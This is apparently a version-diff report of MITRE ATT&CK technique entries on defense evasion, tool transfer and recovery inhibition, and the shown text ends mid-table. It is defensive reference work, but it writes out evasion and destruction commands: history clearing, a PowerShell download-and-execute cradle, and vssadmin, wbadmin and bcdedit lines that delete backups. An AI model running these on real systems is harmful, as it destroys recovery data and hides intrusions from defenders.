On Linux and macOS, command history is tracked in a file pointed to by the environment variable HISTFILE. When a user logs off a system, this information is flushed to a file in the user's home directory called ~/.bash_history. The HISTCONTROL environment variable keeps track of what should be saved by the history command and eventually into the ~/.bash_history file when a user logs out. HISTCONTROL does not exist by default on macOS, but can be set by the user and will be respected. The `HISTFILE` environment variable is also used in some ESXi systems.(Citation: Google Cloud Threat Intelligence ESXi VIBs 2022)
Adversaries may clear the history environment variable (unset HISTFILE) or set the command history size to zero (export HISTFILESIZE=0) to prevent logging of commands. Additionally, HISTCONTROL can be configured to ignore commands that start with a space by simply setting it to "ignorespace". HISTCONTROL can also be set to ignore duplicate commands by setting it to "ignoredups". In some Linux systems, this is set by default to "ignoreboth" which covers both of the previous examples. This means that “ ls” will not be saved, but “ls” would be saved by history. Adversaries can abuse this to operate without leaving traces by simply prepending a space to all of their terminal commands.
On Windows systems, the PSReadLine module tracks commands used in all PowerShell sessions and writes them to a file ($env:APPDATA\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt by default). Adversaries may change where these logs are saved using Set-PSReadLineOption -HistorySavePath {File Path}. This will cause ConsoleHost_history.txt to stop receiving logs. Additionally, it is possible to turn off logging to this file using the PowerShell command Set-PSReadlineOption -HistorySaveStyle SaveNothing.(Citation: Microsoft PowerShell Command History)(Citation: Sophos PowerShell command audit)(Citation: Sophos PowerShell Command History Forensics)
Adversaries may also leverage a [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) on network devices to disable historical command logging (e.g. no logging). |
| external_references[3]['description'] | Vikas, S. (2020, August 26). PowerShell Command History Forensics. Retrieved September 4, 2020. | Vikas, S. (2020, August 26). PowerShell Command History Forensics. Retrieved November 17, 2024. |
| external_references[3]['url'] | https://community.sophos.com/products/malware/b/blog/posts/powershell-command-history-forensics | https://community.sophos.com/sophos-labs/b/blog/posts/powershell-command-history-forensics |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
| x_mitre_version | 2.2 | 2.3 |
| x_mitre_platforms[3] | Network | Network Devices |
iterable_item_added| STIX Field | Old value | New Value |
|---|
| external_references | | {'source_name': 'Google Cloud Threat Intelligence ESXi VIBs 2022', 'description': 'Alexander Marvi, Jeremy Koppen, Tufail Ahmed, and Jonathan Lepore. (2022, September 29). Bad VIB(E)s Part One: Investigating Novel Malware Persistence Within ESXi Hypervisors. Retrieved March 26, 2025.', 'url': 'https://cloud.google.com/blog/topics/threat-intelligence/esxi-hypervisors-malware-persistence'} |
| x_mitre_platforms | | ESXi |
[T1562] Impair Defenses
Current version: 1.7
Version changed from: 1.6 → 1.7
New Mitigations:
- M1042: Disable or Remove Feature or Program
New Detections:
- DS0009: Process (Process Metadata)
Details
dictionary_item_removed| STIX Field | Old value | New Value |
|---|
| x_mitre_defense_bypassed | ['Anti-virus', 'Signature-based detection', 'Host intrusion prevention systems', 'File monitoring', 'Digital Certificate Validation', 'Host forensic analysis', 'Log analysis', 'Firewall'] | |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-10-14 22:11:30.271000+00:00 | 2025-04-15 19:58:24.596000+00:00 |
| x_mitre_version | 1.6 | 1.7 |
| x_mitre_platforms[5] | Network | Network Devices |
iterable_item_added| STIX Field | Old value | New Value |
|---|
| x_mitre_data_sources | | Process: Process Metadata |
| x_mitre_platforms | | ESXi |
[T1525] Implant Internal Image
Current version: 2.2
Version changed from: 2.1 → 2.2
Details
dictionary_item_added| STIX Field | Old value | New Value |
|---|
| x_mitre_attack_spec_version | | 3.2.0 |
dictionary_item_removed| STIX Field | Old value | New Value |
|---|
| x_mitre_permissions_required | ['User'] | |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2022-03-08 21:27:49.094000+00:00 | 2025-04-15 19:58:29.793000+00:00 |
| x_mitre_version | 2.1 | 2.2 |
[T1562.006] Impair Defenses: Indicator Blocking
Current version: 1.5
Version changed from: 1.4 → 1.5
|
|
|---|
| t | An adversary may attempt to block indicators or events typic | t | An adversary may attempt to block indicators or events typic |
| ally captured by sensors from being gathered and analyzed. T | | ally captured by sensors from being gathered and analyzed. T |
| his could include maliciously redirecting(Citation: Microsof | | his could include maliciously redirecting(Citation: Microsof |
| t Lamin Sept 2017) or even disabling host-based sensors, suc | | t Lamin Sept 2017) or even disabling host-based sensors, suc |
| h as Event Tracing for Windows (ETW)(Citation: Microsoft Abo | | h as Event Tracing for Windows (ETW)(Citation: Microsoft Abo |
| ut Event Tracing 2018), by tampering settings that control t | | ut Event Tracing 2018), by tampering settings that control t |
| he collection and flow of event telemetry.(Citation: Medium | | he collection and flow of event telemetry.(Citation: Medium |
| Event Tracing Tampering 2018) These settings may be stored o | | Event Tracing Tampering 2018) These settings may be stored o |
| n the system in configuration files and/or in the Registry a | | n the system in configuration files and/or in the Registry a |
| s well as being accessible via administrative utilities such | | s well as being accessible via administrative utilities such |
| as [PowerShell](https://attack.mitre.org/techniques/T1059/0 | | as [PowerShell](https://attack.mitre.org/techniques/T1059/0 |
| 01) or [Windows Management Instrumentation](https://attack.m | | 01) or [Windows Management Instrumentation](https://attack.m |
| itre.org/techniques/T1047). For example, adversaries may mo | | itre.org/techniques/T1047). For example, adversaries may mo |
| dify the `File` value in <code>HKEY_LOCAL_MACHINE\SYSTEM\Cur | | dify the `File` value in <code>HKEY_LOCAL_MACHINE\SYSTEM\Cur |
| rentControlSet\Services\EventLog\Security</code> to hide the | | rentControlSet\Services\EventLog\Security</code> to hide the |
| ir malicious actions in a new or different .evtx log file. T | | ir malicious actions in a new or different .evtx log file. T |
| his action does not require a system reboot and takes effect | | his action does not require a system reboot and takes effect |
| immediately.(Citation: disable_win_evt_logging) ETW inter | | immediately.(Citation: disable_win_evt_logging) ETW inter |
| ruption can be achieved multiple ways, however most directly | | ruption can be achieved multiple ways, however most directly |
| by defining conditions using the [PowerShell](https://attac | | by defining conditions using the [PowerShell](https://attac |
| k.mitre.org/techniques/T1059/001) <code>Set-EtwTraceProvider | | k.mitre.org/techniques/T1059/001) <code>Set-EtwTraceProvider |
| </code> cmdlet or by interfacing directly with the Registry | | </code> cmdlet or by interfacing directly with the Registry |
| to make alterations. In the case of network-based reporting | | to make alterations. In the case of network-based reporting |
| of indicators, an adversary may block traffic associated wi | | of indicators, an adversary may block traffic associated wi |
| th reporting to prevent central analysis. This may be accomp | | th reporting to prevent central analysis. This may be accomp |
| lished by many means, such as stopping a local process respo | | lished by many means, such as stopping a local process respo |
| nsible for forwarding telemetry and/or creating a host-based | | nsible for forwarding telemetry and/or creating a host-based |
| firewall rule to block traffic to specific hosts responsibl | | firewall rule to block traffic to specific hosts responsibl |
| e for aggregating events, such as security information and e | | e for aggregating events, such as security information and e |
| vent management (SIEM) products. In Linux environments, adv | | vent management (SIEM) products. In Linux environments, adv |
| ersaries may disable or reconfigure log processing tools suc | | ersaries may disable or reconfigure log processing tools suc |
| h as syslog or nxlog to inhibit detection and monitoring cap | | h as syslog or nxlog to inhibit detection and monitoring cap |
| abilities to facilitate follow on behaviors (Citation: Lemon | | abilities to facilitate follow on behaviors. (Citation: Lemo |
| Duck). | | nDuck) ESXi also leverages syslog, which can be reconfigured |
| | | via commands such as `esxcli system syslog config set` and |
| | | `esxcli system syslog config reload`.(Citation: Google Cloud |
| | | Threat Intelligence ESXi VIBs 2022)(Citation: Broadcom Conf |
| | | iguring syslog on ESXi) |
Details
dictionary_item_removed| STIX Field | Old value | New Value |
|---|
| x_mitre_defense_bypassed | ['Anti-virus', 'Host intrusion prevention systems'] | |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-02-14 21:50:32.531000+00:00 | 2025-04-16 21:29:20.899000+00:00 |
| description | An adversary may attempt to block indicators or events typically captured by sensors from being gathered and analyzed. This could include maliciously redirecting(Citation: Microsoft Lamin Sept 2017) or even disabling host-based sensors, such as Event Tracing for Windows (ETW)(Citation: Microsoft About Event Tracing 2018), by tampering settings that control the collection and flow of event telemetry.(Citation: Medium Event Tracing Tampering 2018) These settings may be stored on the system in configuration files and/or in the Registry as well as being accessible via administrative utilities such as [PowerShell](https://attack.mitre.org/techniques/T1059/001) or [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047).
For example, adversaries may modify the `File` value in HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Security to hide their malicious actions in a new or different .evtx log file. This action does not require a system reboot and takes effect immediately.(Citation: disable_win_evt_logging)
ETW interruption can be achieved multiple ways, however most directly by defining conditions using the [PowerShell](https://attack.mitre.org/techniques/T1059/001) Set-EtwTraceProvider cmdlet or by interfacing directly with the Registry to make alterations.
In the case of network-based reporting of indicators, an adversary may block traffic associated with reporting to prevent central analysis. This may be accomplished by many means, such as stopping a local process responsible for forwarding telemetry and/or creating a host-based firewall rule to block traffic to specific hosts responsible for aggregating events, such as security information and event management (SIEM) products.
In Linux environments, adversaries may disable or reconfigure log processing tools such as syslog or nxlog to inhibit detection and monitoring capabilities to facilitate follow on behaviors (Citation: LemonDuck). | An adversary may attempt to block indicators or events typically captured by sensors from being gathered and analyzed. This could include maliciously redirecting(Citation: Microsoft Lamin Sept 2017) or even disabling host-based sensors, such as Event Tracing for Windows (ETW)(Citation: Microsoft About Event Tracing 2018), by tampering settings that control the collection and flow of event telemetry.(Citation: Medium Event Tracing Tampering 2018) These settings may be stored on the system in configuration files and/or in the Registry as well as being accessible via administrative utilities such as [PowerShell](https://attack.mitre.org/techniques/T1059/001) or [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047).
For example, adversaries may modify the `File` value in HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Security to hide their malicious actions in a new or different .evtx log file. This action does not require a system reboot and takes effect immediately.(Citation: disable_win_evt_logging)
ETW interruption can be achieved multiple ways, however most directly by defining conditions using the [PowerShell](https://attack.mitre.org/techniques/T1059/001) Set-EtwTraceProvider cmdlet or by interfacing directly with the Registry to make alterations.
In the case of network-based reporting of indicators, an adversary may block traffic associated with reporting to prevent central analysis. This may be accomplished by many means, such as stopping a local process responsible for forwarding telemetry and/or creating a host-based firewall rule to block traffic to specific hosts responsible for aggregating events, such as security information and event management (SIEM) products.
In Linux environments, adversaries may disable or reconfigure log processing tools such as syslog or nxlog to inhibit detection and monitoring capabilities to facilitate follow on behaviors. (Citation: LemonDuck) ESXi also leverages syslog, which can be reconfigured via commands such as `esxcli system syslog config set` and `esxcli system syslog config reload`.(Citation: Google Cloud Threat Intelligence ESXi VIBs 2022)(Citation: Broadcom Configuring syslog on ESXi) |
| x_mitre_version | 1.4 | 1.5 |
iterable_item_added| STIX Field | Old value | New Value |
|---|
| external_references | | {'source_name': 'Google Cloud Threat Intelligence ESXi VIBs 2022', 'description': 'Alexander Marvi, Jeremy Koppen, Tufail Ahmed, and Jonathan Lepore. (2022, September 29). Bad VIB(E)s Part One: Investigating Novel Malware Persistence Within ESXi Hypervisors. Retrieved March 26, 2025.', 'url': 'https://cloud.google.com/blog/topics/threat-intelligence/esxi-hypervisors-malware-persistence'} |
| external_references | | {'source_name': 'Broadcom Configuring syslog on ESXi', 'description': 'Broadcom. (n.d.). Configuring syslog on ESXi. Retrieved March 27, 2025.', 'url': 'https://knowledge.broadcom.com/external/article/318939/configuring-syslog-on-esxi.html'} |
| x_mitre_platforms | | ESXi |
[T1070] Indicator Removal
Current version: 2.3
Version changed from: 2.2 → 2.3
Details
dictionary_item_removed| STIX Field | Old value | New Value |
|---|
| x_mitre_defense_bypassed | ['Log analysis', 'Host intrusion prevention systems', 'Anti-virus'] | |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-10-15 15:59:22.125000+00:00 | 2025-04-15 19:58:43.436000+00:00 |
| x_mitre_version | 2.2 | 2.3 |
| x_mitre_platforms[4] | Network | Network Devices |
iterable_item_added| STIX Field | Old value | New Value |
|---|
| x_mitre_platforms | | ESXi |
[T1027.005] Obfuscated Files or Information: Indicator Removal from Tools
Current version: 1.2
Version changed from: 1.1 → 1.2
Details
dictionary_item_removed| STIX Field | Old value | New Value |
|---|
| x_mitre_defense_bypassed | ['Anti-virus', 'Host intrusion prevention systems', 'Log analysis', 'Signature-based detection'] | |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2022-04-28 16:07:48.062000+00:00 | 2025-04-16 20:37:19.031000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
| x_mitre_version | 1.1 | 1.2 |
[T1202] Indirect Command Execution
Current version: 1.3
Version changed from: 1.2 → 1.3
|
|
|---|
| t | Adversaries may abuse utilities that allow for command execu | t | Adversaries may abuse utilities that allow for command execu |
| tion to bypass security restrictions that limit the use of c | | tion to bypass security restrictions that limit the use of c |
| ommand-line interpreters. Various Windows utilities may be u | | ommand-line interpreters. Various Windows utilities may be u |
| sed to execute commands, possibly without invoking [cmd](htt | | sed to execute commands, possibly without invoking [cmd](htt |
| ps://attack.mitre.org/software/S0106). For example, [Forfile | | ps://attack.mitre.org/software/S0106). For example, [Forfile |
| s](https://attack.mitre.org/software/S0193), the Program Com | | s](https://attack.mitre.org/software/S0193), the Program Com |
| patibility Assistant (pcalua.exe), components of the Windows | | patibility Assistant (`pcalua.exe`), components of the Windo |
| Subsystem for Linux (WSL), Scriptrunner.exe, as well as oth | | ws Subsystem for Linux (WSL), `Scriptrunner.exe`, as well as |
| er utilities may invoke the execution of programs and comman | | other utilities may invoke the execution of programs and co |
| ds from a [Command and Scripting Interpreter](https://attack | | mmands from a [Command and Scripting Interpreter](https://at |
| .mitre.org/techniques/T1059), Run window, or via scripts.(Ci | | tack.mitre.org/techniques/T1059), Run window, or via scripts |
| tation: VectorSec ForFiles Aug 2017)(Citation: Evi1cg Forfil | | .(Citation: VectorSec ForFiles Aug 2017)(Citation: Evi1cg Fo |
| es Nov 2017)(Citation: Secure Team - Scriptrunner.exe)(Citat | | rfiles Nov 2017)(Citation: Secure Team - Scriptrunner.exe)(C |
| ion: SS64)(Citation: Bleeping Computer - Scriptrunner.exe) | | itation: SS64)(Citation: Bleeping Computer - Scriptrunner.ex |
| Adversaries may abuse these features for [Defense Evasion](h | | e) Adversaries may also abuse the `ssh.exe` binary to execut |
| ttps://attack.mitre.org/tactics/TA0005), specifically to per | | e malicious commands via the `ProxyCommand` and `LocalComman |
| form arbitrary execution while subverting detections and/or | | d` options, which can be invoked via the `-o` flag or by mod |
| mitigation controls (such as Group Policy) that limit/preven | | ifying the SSH config file.(Citation: Threat Actor Targets t |
| t the usage of [cmd](https://attack.mitre.org/software/S0106 | | he Manufacturing industry with Lumma Stealer and Amadey Bot) |
| ) or file extensions more commonly associated with malicious | | Adversaries may abuse these features for [Defense Evasion] |
| payloads. | | (https://attack.mitre.org/tactics/TA0005), specifically to p |
| | | erform arbitrary execution while subverting detections and/o |
| | | r mitigation controls (such as Group Policy) that limit/prev |
| | | ent the usage of [cmd](https://attack.mitre.org/software/S01 |
| | | 06) or file extensions more commonly associated with malicio |
| | | us payloads. |
Details
dictionary_item_removed| STIX Field | Old value | New Value |
|---|
| x_mitre_defense_bypassed | ['Static File Analysis', 'Application Control'] | |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-10-03 14:47:17.154000+00:00 | 2025-04-15 19:58:23.859000+00:00 |
| description | Adversaries may abuse utilities that allow for command execution to bypass security restrictions that limit the use of command-line interpreters. Various Windows utilities may be used to execute commands, possibly without invoking [cmd](https://attack.mitre.org/software/S0106). For example, [Forfiles](https://attack.mitre.org/software/S0193), the Program Compatibility Assistant (pcalua.exe), components of the Windows Subsystem for Linux (WSL), Scriptrunner.exe, as well as other utilities may invoke the execution of programs and commands from a [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059), Run window, or via scripts.(Citation: VectorSec ForFiles Aug 2017)(Citation: Evi1cg Forfiles Nov 2017)(Citation: Secure Team - Scriptrunner.exe)(Citation: SS64)(Citation: Bleeping Computer - Scriptrunner.exe)
Adversaries may abuse these features for [Defense Evasion](https://attack.mitre.org/tactics/TA0005), specifically to perform arbitrary execution while subverting detections and/or mitigation controls (such as Group Policy) that limit/prevent the usage of [cmd](https://attack.mitre.org/software/S0106) or file extensions more commonly associated with malicious payloads. | Adversaries may abuse utilities that allow for command execution to bypass security restrictions that limit the use of command-line interpreters. Various Windows utilities may be used to execute commands, possibly without invoking [cmd](https://attack.mitre.org/software/S0106). For example, [Forfiles](https://attack.mitre.org/software/S0193), the Program Compatibility Assistant (`pcalua.exe`), components of the Windows Subsystem for Linux (WSL), `Scriptrunner.exe`, as well as other utilities may invoke the execution of programs and commands from a [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059), Run window, or via scripts.(Citation: VectorSec ForFiles Aug 2017)(Citation: Evi1cg Forfiles Nov 2017)(Citation: Secure Team - Scriptrunner.exe)(Citation: SS64)(Citation: Bleeping Computer - Scriptrunner.exe) Adversaries may also abuse the `ssh.exe` binary to execute malicious commands via the `ProxyCommand` and `LocalCommand` options, which can be invoked via the `-o` flag or by modifying the SSH config file.(Citation: Threat Actor Targets the Manufacturing industry with Lumma Stealer and Amadey Bot)
Adversaries may abuse these features for [Defense Evasion](https://attack.mitre.org/tactics/TA0005), specifically to perform arbitrary execution while subverting detections and/or mitigation controls (such as Group Policy) that limit/prevent the usage of [cmd](https://attack.mitre.org/software/S0106) or file extensions more commonly associated with malicious payloads. |
| x_mitre_version | 1.2 | 1.3 |
iterable_item_added| STIX Field | Old value | New Value |
|---|
| external_references | | {'source_name': 'Threat Actor Targets the Manufacturing industry with Lumma Stealer and Amadey Bot', 'description': 'Cyble. (2024, December 5). Threat Actor Targets the Manufacturing industry with Lumma Stealer and Amadey Bot. Retrieved February 4, 2025.', 'url': 'https://cyble.com/blog/threat-actor-targets-manufacturing-industry-with-malware/'} |
[T1105] Ingress Tool Transfer
Current version: 2.5
Version changed from: 2.4 → 2.5
|
|
|---|
| t | Adversaries may transfer tools or other files from an extern | t | Adversaries may transfer tools or other files from an extern |
| al system into a compromised environment. Tools or files may | | al system into a compromised environment. Tools or files may |
| be copied from an external adversary-controlled system to t | | be copied from an external adversary-controlled system to t |
| he victim network through the command and control channel or | | he victim network through the command and control channel or |
| through alternate protocols such as [ftp](https://attack.mi | | through alternate protocols such as [ftp](https://attack.mi |
| tre.org/software/S0095). Once present, adversaries may also | | tre.org/software/S0095). Once present, adversaries may also |
| transfer/spread tools between victim devices within a compro | | transfer/spread tools between victim devices within a compro |
| mised environment (i.e. [Lateral Tool Transfer](https://atta | | mised environment (i.e. [Lateral Tool Transfer](https://atta |
| ck.mitre.org/techniques/T1570)). On Windows, adversaries m | | ck.mitre.org/techniques/T1570)). On Windows, adversaries m |
| ay use various utilities to download tools, such as `copy`, | | ay use various utilities to download tools, such as `copy`, |
| `finger`, [certutil](https://attack.mitre.org/software/S0160 | | `finger`, [certutil](https://attack.mitre.org/software/S0160 |
| ), and [PowerShell](https://attack.mitre.org/techniques/T105 | | ), and [PowerShell](https://attack.mitre.org/techniques/T105 |
| 9/001) commands such as <code>IEX(New-Object Net.WebClient). | | 9/001) commands such as <code>IEX(New-Object Net.WebClient). |
| downloadString()</code> and <code>Invoke-WebRequest</code>. | | downloadString()</code> and <code>Invoke-WebRequest</code>. |
| On Linux and macOS systems, a variety of utilities also exis | | On Linux and macOS systems, a variety of utilities also exis |
| t, such as `curl`, `scp`, `sftp`, `tftp`, `rsync`, `finger`, | | t, such as `curl`, `scp`, `sftp`, `tftp`, `rsync`, `finger`, |
| and `wget`.(Citation: t1105_lolbas) Adversaries may also a | | and `wget`.(Citation: t1105_lolbas) A number of these tool |
| buse installers and package managers, such as `yum` or `wing | | s, such as `wget`, `curl`, and `scp`, also exist on ESXi. Af |
| et`, to download tools to victim hosts. Adversaries have als | | ter downloading a file, a threat actor may attempt to verify |
| o abused file application features, such as the Windows `sea | | its integrity by checking its hash value (e.g., via `certut |
| rch-ms` protocol handler, to deliver malicious files to vict | | il -hashfile`).(Citation: Google Cloud Threat Intelligence C |
| ims through remote file searches invoked by [User Execution] | | OSCMICENERGY 2023) Adversaries may also abuse installers an |
| (https://attack.mitre.org/techniques/T1204) (typically after | | d package managers, such as `yum` or `winget`, to download t |
| interacting with [Phishing](https://attack.mitre.org/techni | | ools to victim hosts. Adversaries have also abused file appl |
| ques/T1566) lures).(Citation: T1105: Trellix_search-ms) Fil | | ication features, such as the Windows `search-ms` protocol h |
| es can also be transferred using various [Web Service](https | | andler, to deliver malicious files to victims through remote |
| ://attack.mitre.org/techniques/T1102)s as well as native or | | file searches invoked by [User Execution](https://attack.mi |
| otherwise present tools on the victim system.(Citation: PTSe | | tre.org/techniques/T1204) (typically after interacting with |
| curity Cobalt Dec 2016) In some cases, adversaries may be ab | | [Phishing](https://attack.mitre.org/techniques/T1566) lures) |
| le to leverage services that sync between a web-based and an | | .(Citation: T1105: Trellix_search-ms) Files can also be tra |
| on-premises client, such as Dropbox or OneDrive, to transfe | | nsferred using various [Web Service](https://attack.mitre.or |
| r files onto victim systems. For example, by compromising a | | g/techniques/T1102)s as well as native or otherwise present |
| cloud account and logging into the service's web portal, an | | tools on the victim system.(Citation: PTSecurity Cobalt Dec |
| adversary may be able to trigger an automatic syncing proces | | 2016) In some cases, adversaries may be able to leverage ser |
| s that transfers the file onto the victim's machine.(Citatio | | vices that sync between a web-based and an on-premises clien |
| n: Dropbox Malware Sync) | | t, such as Dropbox or OneDrive, to transfer files onto victi |
| | | m systems. For example, by compromising a cloud account and |
| | | logging into the service's web portal, an adversary may be a |
| | | ble to trigger an automatic syncing process that transfers t |
| | | he file onto the victim's machine.(Citation: Dropbox Malware |
| | | Sync) |
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-04-11 15:08:01.731000+00:00 | 2025-04-15 19:59:17.217000+00:00 |
| description | Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as [ftp](https://attack.mitre.org/software/S0095). Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. [Lateral Tool Transfer](https://attack.mitre.org/techniques/T1570)).
On Windows, adversaries may use various utilities to download tools, such as `copy`, `finger`, [certutil](https://attack.mitre.org/software/S0160), and [PowerShell](https://attack.mitre.org/techniques/T1059/001) commands such as IEX(New-Object Net.WebClient).downloadString() and Invoke-WebRequest. On Linux and macOS systems, a variety of utilities also exist, such as `curl`, `scp`, `sftp`, `tftp`, `rsync`, `finger`, and `wget`.(Citation: t1105_lolbas)
Adversaries may also abuse installers and package managers, such as `yum` or `winget`, to download tools to victim hosts. Adversaries have also abused file application features, such as the Windows `search-ms` protocol handler, to deliver malicious files to victims through remote file searches invoked by [User Execution](https://attack.mitre.org/techniques/T1204) (typically after interacting with [Phishing](https://attack.mitre.org/techniques/T1566) lures).(Citation: T1105: Trellix_search-ms)
Files can also be transferred using various [Web Service](https://attack.mitre.org/techniques/T1102)s as well as native or otherwise present tools on the victim system.(Citation: PTSecurity Cobalt Dec 2016) In some cases, adversaries may be able to leverage services that sync between a web-based and an on-premises client, such as Dropbox or OneDrive, to transfer files onto victim systems. For example, by compromising a cloud account and logging into the service's web portal, an adversary may be able to trigger an automatic syncing process that transfers the file onto the victim's machine.(Citation: Dropbox Malware Sync) | Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as [ftp](https://attack.mitre.org/software/S0095). Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. [Lateral Tool Transfer](https://attack.mitre.org/techniques/T1570)).
On Windows, adversaries may use various utilities to download tools, such as `copy`, `finger`, [certutil](https://attack.mitre.org/software/S0160), and [PowerShell](https://attack.mitre.org/techniques/T1059/001) commands such as IEX(New-Object Net.WebClient).downloadString() and Invoke-WebRequest. On Linux and macOS systems, a variety of utilities also exist, such as `curl`, `scp`, `sftp`, `tftp`, `rsync`, `finger`, and `wget`.(Citation: t1105_lolbas) A number of these tools, such as `wget`, `curl`, and `scp`, also exist on ESXi. After downloading a file, a threat actor may attempt to verify its integrity by checking its hash value (e.g., via `certutil -hashfile`).(Citation: Google Cloud Threat Intelligence COSCMICENERGY 2023)
Adversaries may also abuse installers and package managers, such as `yum` or `winget`, to download tools to victim hosts. Adversaries have also abused file application features, such as the Windows `search-ms` protocol handler, to deliver malicious files to victims through remote file searches invoked by [User Execution](https://attack.mitre.org/techniques/T1204) (typically after interacting with [Phishing](https://attack.mitre.org/techniques/T1566) lures).(Citation: T1105: Trellix_search-ms)
Files can also be transferred using various [Web Service](https://attack.mitre.org/techniques/T1102)s as well as native or otherwise present tools on the victim system.(Citation: PTSecurity Cobalt Dec 2016) In some cases, adversaries may be able to leverage services that sync between a web-based and an on-premises client, such as Dropbox or OneDrive, to transfer files onto victim systems. For example, by compromising a cloud account and logging into the service's web portal, an adversary may be able to trigger an automatic syncing process that transfers the file onto the victim's machine.(Citation: Dropbox Malware Sync) |
| x_mitre_version | 2.4 | 2.5 |
| x_mitre_platforms[3] | Network | Network Devices |
iterable_item_added| STIX Field | Old value | New Value |
|---|
| external_references | | {'source_name': 'Google Cloud Threat Intelligence COSCMICENERGY 2023', 'description': 'COSMICENERGY: New OT Malware Possibly Related To Russian Emergency Response Exercises. (2023, May 25). Ken Proska, Daniel Kapellmann Zafra, Keith Lunden, Corey Hildebrandt, Rushikesh Nandedkar, Nathan Brubaker. Retrieved March 18, 2025.', 'url': 'https://cloud.google.com/blog/topics/threat-intelligence/cosmicenergy-ot-malware-russian-response/'} |
| x_mitre_contributors | | Peter Oakes |
| x_mitre_platforms | | ESXi |
[T1490] Inhibit System Recovery
Current version: 1.6
Version changed from: 1.5 → 1.6
|
|
|---|
| t | Adversaries may delete or remove built-in data and turn off | t | Adversaries may delete or remove built-in data and turn off |
| services designed to aid in the recovery of a corrupted syst | | services designed to aid in the recovery of a corrupted syst |
| em to prevent recovery.(Citation: Talos Olympic Destroyer 20 | | em to prevent recovery.(Citation: Talos Olympic Destroyer 20 |
| 18)(Citation: FireEye WannaCry 2017) This may deny access to | | 18)(Citation: FireEye WannaCry 2017) This may deny access to |
| available backups and recovery options. Operating systems | | available backups and recovery options. Operating systems |
| may contain features that can help fix corrupted systems, su | | may contain features that can help fix corrupted systems, su |
| ch as a backup catalog, volume shadow copies, and automatic | | ch as a backup catalog, volume shadow copies, and automatic |
| repair features. Adversaries may disable or delete system re | | repair features. Adversaries may disable or delete system re |
| covery features to augment the effects of [Data Destruction] | | covery features to augment the effects of [Data Destruction] |
| (https://attack.mitre.org/techniques/T1485) and [Data Encryp | | (https://attack.mitre.org/techniques/T1485) and [Data Encryp |
| ted for Impact](https://attack.mitre.org/techniques/T1486).( | | ted for Impact](https://attack.mitre.org/techniques/T1486).( |
| Citation: Talos Olympic Destroyer 2018)(Citation: FireEye Wa | | Citation: Talos Olympic Destroyer 2018)(Citation: FireEye Wa |
| nnaCry 2017) Furthermore, adversaries may disable recovery n | | nnaCry 2017) Furthermore, adversaries may disable recovery n |
| otifications, then corrupt backups.(Citation: disable_notif_ | | otifications, then corrupt backups.(Citation: disable_notif_ |
| synology_ransom) A number of native Windows utilities have | | synology_ransom) A number of native Windows utilities have |
| been used by adversaries to disable or delete system recover | | been used by adversaries to disable or delete system recover |
| y features: * <code>vssadmin.exe</code> can be used to dele | | y features: * <code>vssadmin.exe</code> can be used to dele |
| te all volume shadow copies on a system - <code>vssadmin.exe | | te all volume shadow copies on a system - <code>vssadmin.exe |
| delete shadows /all /quiet</code> * [Windows Management Ins | | delete shadows /all /quiet</code> * [Windows Management Ins |
| trumentation](https://attack.mitre.org/techniques/T1047) can | | trumentation](https://attack.mitre.org/techniques/T1047) can |
| be used to delete volume shadow copies - <code>wmic shadowc | | be used to delete volume shadow copies - <code>wmic shadowc |
| opy delete</code> * <code>wbadmin.exe</code> can be used to | | opy delete</code> * <code>wbadmin.exe</code> can be used to |
| delete the Windows Backup Catalog - <code>wbadmin.exe delete | | delete the Windows Backup Catalog - <code>wbadmin.exe delete |
| catalog -quiet</code> * <code>bcdedit.exe</code> can be use | | catalog -quiet</code> * <code>bcdedit.exe</code> can be use |
| d to disable automatic Windows recovery features by modifyin | | d to disable automatic Windows recovery features by modifyin |
| g boot configuration data - <code>bcdedit.exe /set {default} | | g boot configuration data - <code>bcdedit.exe /set {default} |
| bootstatuspolicy ignoreallfailures & bcdedit /set {default} | | bootstatuspolicy ignoreallfailures & bcdedit /set {default} |
| recoveryenabled no</code> * <code>REAgentC.exe</code> can b | | recoveryenabled no</code> * <code>REAgentC.exe</code> can b |
| e used to disable Windows Recovery Environment (WinRE) repai | | e used to disable Windows Recovery Environment (WinRE) repai |
| r/recovery options of an infected system * <code>diskshadow. | | r/recovery options of an infected system * <code>diskshadow. |
| exe</code> can be used to delete all volume shadow copies on | | exe</code> can be used to delete all volume shadow copies on |
| a system - <code>diskshadow delete shadows all</code> (Cita | | a system - <code>diskshadow delete shadows all</code> (Cita |
| tion: Diskshadow) (Citation: Crytox Ransomware) On network | | tion: Diskshadow) (Citation: Crytox Ransomware) On network |
| devices, adversaries may leverage [Disk Wipe](https://attack | | devices, adversaries may leverage [Disk Wipe](https://attack |
| .mitre.org/techniques/T1561) to delete backup firmware image | | .mitre.org/techniques/T1561) to delete backup firmware image |
| s and reformat the file system, then [System Shutdown/Reboot | | s and reformat the file system, then [System Shutdown/Reboot |
| ](https://attack.mitre.org/techniques/T1529) to reload the d | | ](https://attack.mitre.org/techniques/T1529) to reload the d |
| evice. Together this activity may leave network devices comp | | evice. Together this activity may leave network devices comp |
| letely inoperable and inhibit recovery operations. Adversar | | letely inoperable and inhibit recovery operations. On ESXi |
| ies may also delete “online” backups that are connected to t | | servers, adversaries may delete or encrypt snapshots of virt |
